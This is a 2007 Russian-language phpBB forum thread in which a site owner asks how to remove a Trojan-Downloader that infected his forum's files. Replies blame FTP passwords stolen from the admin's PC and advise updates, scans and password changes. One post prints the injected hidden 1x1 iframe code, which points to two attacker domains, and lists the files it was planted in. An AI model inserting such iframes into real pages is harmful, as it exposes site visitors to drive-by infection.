Как убить Трояна?

Вопросы без привязки к версии. Установлена авточистка (2 года).
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ | Как задавать вопросы | Как устанавливать расширения

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Зарегистрирован: 03.09.2006 19:10
Благодарил (а): 1 раз

Как убить Трояна?

Сообщение AdmninsCluba » 12.05.2007 16:23

обнаружено: троянская программа Trojan-Downloader.VBS.Small.dh

Почистил файл - index.php. Не помогло. Что надо сделать чтобы найти и убить скрипт?

Спасибо.

ОТВЕТ:
- проверяемся на вирусы
- меняем ВСЕ пароли и не храним их в FTP-клиенте.
- чистим файлы Index.* или заливаем из бэкапа.

http://virusinfo.info/pravila.html

Аватара пользователя
crash
Former team member
Сообщения: 6523
Зарегистрирован: 07.07.2004 17:12
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение crash » 12.05.2007 16:31

AdmninsCluba писал(а):Что надо сделать чтобы найти и убить скрипт?
антивирус.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса

AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Зарегистрирован: 03.09.2006 19:10
Благодарил (а): 1 раз

Сообщение AdmninsCluba » 12.05.2007 16:44

антивирус.
Касперский стоит.

Хостер сказал, что Троян залез через дырку форума. Где искать и исправлять проблему с Трояном? В паках управления, или Админ панели форума?

Аватара пользователя
Палыч
Former team member
Сообщения: 9688
Зарегистрирован: 24.05.2006 23:20
Откуда: Питер
Благодарил (а): 3 раза
Поблагодарили: 453 раза
Контактная информация:

Сообщение Палыч » 12.05.2007 16:45

AdmninsCluba писал(а):Хостер сказал, что Троян залез через дырку форума.
Тогда пусть хостер и скажет, где эта дырка
Не все то WINDOWS, что висит... phpBB только учусь.
ICQ, email, ЛС - только для личных сообщений. Вопросы по phpbb только на форумах. По найму не работаю.

Аватара пользователя
rxu
phpBB Guru
phpBB Guru
Сообщения: 14171
Зарегистрирован: 12.05.2006 18:16
Откуда: Красноярск
Благодарил (а): 332 раза
Поблагодарили: 1446 раз
Контактная информация:

Сообщение rxu » 12.05.2007 16:49

AdmninsCluba
А если не секрет, какая версия phpBB установлена?
Изображение

Аватара пользователя
crash
Former team member
Сообщения: 6523
Зарегистрирован: 07.07.2004 17:12
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение crash » 12.05.2007 16:50

AdmninsCluba
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса

AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Зарегистрирован: 03.09.2006 19:10
Благодарил (а): 1 раз

Сообщение AdmninsCluba » 12.05.2007 17:05

А если не секрет, какая версия phpBB установлена?
Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.

Но версия не поменялась в админ панели. Может надо обновить форум?
ну так вот каспреского и натравите на файлы, если он у вас стоит на сервере
Локалхоста нет. Резервную копию откатываю папками.

Касперский найдет проблему в папках на компьютере или нет? Обязательно нужен Денвер?

Аватара пользователя
crash
Former team member
Сообщения: 6523
Зарегистрирован: 07.07.2004 17:12
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение crash » 12.05.2007 17:10

AdmninsCluba писал(а):Версия phpBB 2.0.20, час назад попытался обновить до phpBB 2.0.21.
уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.
AdmninsCluba писал(а):Касперский найдет проблему в папках на компьютере или нет?
на вашем компьютере он найдет все что угодно.
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса

AdmninsCluba
phpBB 1.2.1
Сообщения: 22
Зарегистрирован: 03.09.2006 19:10
Благодарил (а): 1 раз

Сообщение AdmninsCluba » 12.05.2007 17:39

crash писал(а):уже полгода назад надо было до 2.0.22 обновить. Так что сносите все файлы и заливайте последнюю версию.
Почему я с трояном не смогу обновить версию форума?

Аватара пользователя
crash
Former team member
Сообщения: 6523
Зарегистрирован: 07.07.2004 17:12
Откуда: Бердск
Поблагодарили: 15 раз
Контактная информация:

Сообщение crash » 12.05.2007 17:50

AdmninsCluba писал(а):Почему я с трояном не смогу обновить версию форума?
AdmninsCluba писал(а):Почистил файл - index.php. Не помогло
можете, но так с ним и останетесь
Как правильно задавать вопросы
Для особо одаренных: поиск - это есть круто.
FAQ v.2 | FAQ v.3 | Шаблон запроса

Аватара пользователя
edgar
phpBB 2.0.13
Сообщения: 926
Зарегистрирован: 26.07.2005 7:20
Откуда: с Луны свалил...

Сообщение edgar » 12.05.2007 19:16

Сейчас эпидемия. Троян приобретается от зараженных сайтов через браузер IE, ворует пароли FTP (и не только) и заражает новые сайты.
Признак - левый iframe в коде страниц.
Надо удалить код с сайта, выполнить полную проверку компа (последние НОД и Каспер вроде убивают их, но сейчас много таких троянов), убить IE и ставить чистый и больше им не пользоваться. :) Ну может еще что-то надо...
Ни к каким уязвимостям форумов и хостеров это не относится. Смотрите Гугл, там всё есть

Аватара пользователя
go
phpBB 2.0.1
Сообщения: 261
Зарегистрирован: 13.03.2006 23:12

Сообщение go » 12.05.2007 19:57

edgar писал(а):убить IE и ставить чистый и больше им не пользоваться.
зачем ставить если в последствии дается совет - более не пользоватся? :(
или сайтом не пользоваться?

Аватара пользователя
edgar
phpBB 2.0.13
Сообщения: 926
Зарегистрирован: 26.07.2005 7:20
Откуда: с Луны свалил...

Сообщение edgar » 12.05.2007 20:18

go писал(а):зачем ставить
А как же при переустановке винды его не поставить? :( Или у вас другая ос.

Я в общем нашел, что троян убивает только файл iexplore.exe. Выявляется это и лечится утилитой HaxFix 4.41
У меня ссылка есть, но я ее не дам, так как это haxfix.exe. Подумаете еще плохое что-нибудь... :) Но найти не сложно.
После запуска надо выбрать 2. Run auto fix
Ну и потом, естественно все пароли сменить - фтп, аськи и т.д.

Xpert
phpBB Guru
phpBB Guru
Сообщения: 5486
Зарегистрирован: 13.03.2004 21:27
Поблагодарили: 2 раза
Контактная информация:

Сообщение Xpert » 23.05.2007 9:20

Некоторые технические подробности, поскольку недавно один клиент подцепил подобного трояна...

Внедряется в
admin/index.php
login.php
index.php
includes/auth.php


Добавляет такой код:

Код: Выделить всё

<iframe src='http://kleman.info' width='1' height='1' style='visibility: hidden;'></iframe>
Или такой

Код: Выделить всё

<iframe src='http://tstats.biz/st/index.php' width='1' height='1' style='visibility: hidden;'></iframe>
Или оба вместе

Еще его вставляют в файлы index.html в папках.

После того как был сменен пароль на FTP, проблемы исчезли.
Эксперт - это человек, который избегает мелких ошибок на пути к грандиозному провалу.
Любая более-менее сложная задача имеет несколько простых, изящных, лёгких для понимания неправильных решений

Аватара пользователя
amelanin
phpBB 1.2.1
Сообщения: 20
Зарегистрирован: 07.09.2006 7:08
Откуда: Санкт-Петербург
Контактная информация:

Сообщение amelanin » 23.05.2007 9:59

У меня такое было - подробности кидал тут - http://tsbs.ru/forum/index.php?showtopic=2924&st=0

обнаружено - пароли свистят из ftp менеджера, в основном тотал-коммандера.
сайты заражаются 2-3 раза в месяц.
т.е. каждые дней десять.
страдают все индексные файлы main.* defolt.* index.* c любыми расширениями.
о том что страдает login.php и auth.php слышу впервые - однако вполне возможно.
логи показывают что скрипт шарится по всем папкам в поисках индексного файла.
при воздействии иногда просто добавляется iframe а иногда этот iframe полностью стирает всю страницу вписывая себя.

Ответить

Вернуться в «phpBB-пространство»